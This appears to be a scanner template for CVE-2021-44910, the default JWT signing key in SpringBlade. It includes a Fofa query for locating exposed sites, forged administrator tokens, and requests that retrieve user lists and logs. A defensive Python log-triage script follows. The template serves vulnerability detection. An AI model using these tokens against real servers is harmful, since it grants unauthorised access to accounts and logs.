Vulnerability description
The SpringBlade framework ships with a default SIGN_KEY (JWT signing secret); an attacker who knows it can forge tokens and obtain sensitive information such as user accounts, passwords and logs.
Fofa: body="saber/iconfont.css" || body="Saber 将不能正常工作"||title="Sword Admin"||body="We're sorry but avue-data doesn't work"
id: CVE-2021-44910

info:
  name: SpringBlade 框架默认 SIGN_KEY 秘钥漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    SpringBlade 框架存在默认SIGN_KEY,攻击者可利用漏洞获取用户账号密码日志等敏感信息。
    Fofa: body="saber/iconfont.css" || body="Saber 将不能正常工作"||title="Sword Admin"||body="We're sorry but avue-data doesn't work"
  reference:
    - https://forum.butian.net/share/973
  tags: cve,cve2021,bypass,springblade
  created: 2023/12/12

set:
  token1: "bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg"
  token2: "bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ"
  token3: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.5qFj53pqhIZVccg_h0WAvd-FAjG7sDwfVUe5gPBHa0g
  token4: eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk
  token5: eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg

rules:
  r0:
    request:
      method: GET
      path: /api/blade-user/user-list
      headers:
        Blade-Auth: "{{token1}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r1:
    request:
      method: GET
      path: /api/blade-user/user-list
      headers:
        Blade-Auth: "{{token2}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r2:
    request:
      method: GET
      path: /api/blade-log/api/list
      headers:
        Blade-Auth: "{{token1}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"params":') && response.body.bcontains(b'"msg":')
  r3:
    request:
      method: GET
      path: /api/blade-system/user/user-list
      headers:
        Blade-Auth: "{{token1}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r4:
    request:
      method: GET
      path: /api/blade-system/user/user-list
      headers:
        Blade-Auth: "{{token2}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r5:
    request:
      method: GET
      path: /api/blade-system/user/api/list
      headers:
        Blade-Auth: "{{token1}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"params":') && response.body.bcontains(b'"msg":')
  r6:
    request:
      method: GET
      path: /api/blade-user/user-list
      headers:
        Blade-Auth: "{{token3}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r7:
    request:
      method: GET
      path: /api/blade-user/user-list
      headers:
        Blade-Auth: "{{token4}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
  r8:
    request:
      method: GET
      path: /api/blade-user/user-list
      headers:
        Blade-Auth: "{{token5}}"
    expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8()
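The tokens in this template are public, so a defender can treat them as indicators. The following Python is an added example, not part of the template or of SpringBlade: it decodes a Blade-Auth header without verifying it (log triage, not authentication), flags the template's own token signatures, flags administrator claims aimed at the endpoints the template probes, and flags tokens with no exp claim (none of the five above has one). The token embedded is the template's token3; the triage heuristics and their wording are this example's own.

```python
import base64
import json

# HS256 PoC token from the scanner template above (public, so safe to match on).
POC_TOKEN_HS256 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.5qFj53pqhIZVccg_h0WAvd-FAjG7sDwfVUe5gPBHa0g"

# Signatures (third JWT segment) of the template's token1 and token3. A hit in
# your own access logs means the public PoC, or a replay of it, reached the server.
KNOWN_POC_SIGNATURES = {
    "-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg",
    POC_TOKEN_HS256.rsplit(".", 1)[1],
}

# Endpoints the template probes with its forged admin tokens.
PROBED_PATHS = {
    "/api/blade-user/user-list",
    "/api/blade-log/api/list",
    "/api/blade-system/user/user-list",
    "/api/blade-system/user/api/list",
}


def b64url_decode(segment: str) -> bytes:
    # JWT segments omit base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_blade_auth(header_value: str) -> dict:
    """Split a Blade-Auth value into header, claims and signature WITHOUT
    verifying it: this is log triage, not authentication."""
    token = header_value.strip()
    if token.lower().startswith("bearer "):   # token1/token2 carry this prefix
        token = token[7:]
    head, body, sig = token.split(".")
    return {
        "header": json.loads(b64url_decode(head)),
        "claims": json.loads(b64url_decode(body)),
        "signature": sig,
    }


def triage(path: str, header_value: str) -> list:
    """Reasons a logged request looks like CVE-2021-44910 probing or abuse."""
    t = decode_blade_auth(header_value)
    reasons = []
    if t["signature"] in KNOWN_POC_SIGNATURES:
        reasons.append("known public PoC token")
    if path in PROBED_PATHS and t["claims"].get("role_name") == "administrator":
        reasons.append("admin claims against a PoC-probed endpoint")
    if "exp" not in t["claims"]:
        reasons.append("no exp claim: token never expires")
    return reasons
```

The heuristics return reasons for an analyst to review, not a verdict; legitimate administrators hitting user-list will trip the second rule, which is why the signature match is the strong signal.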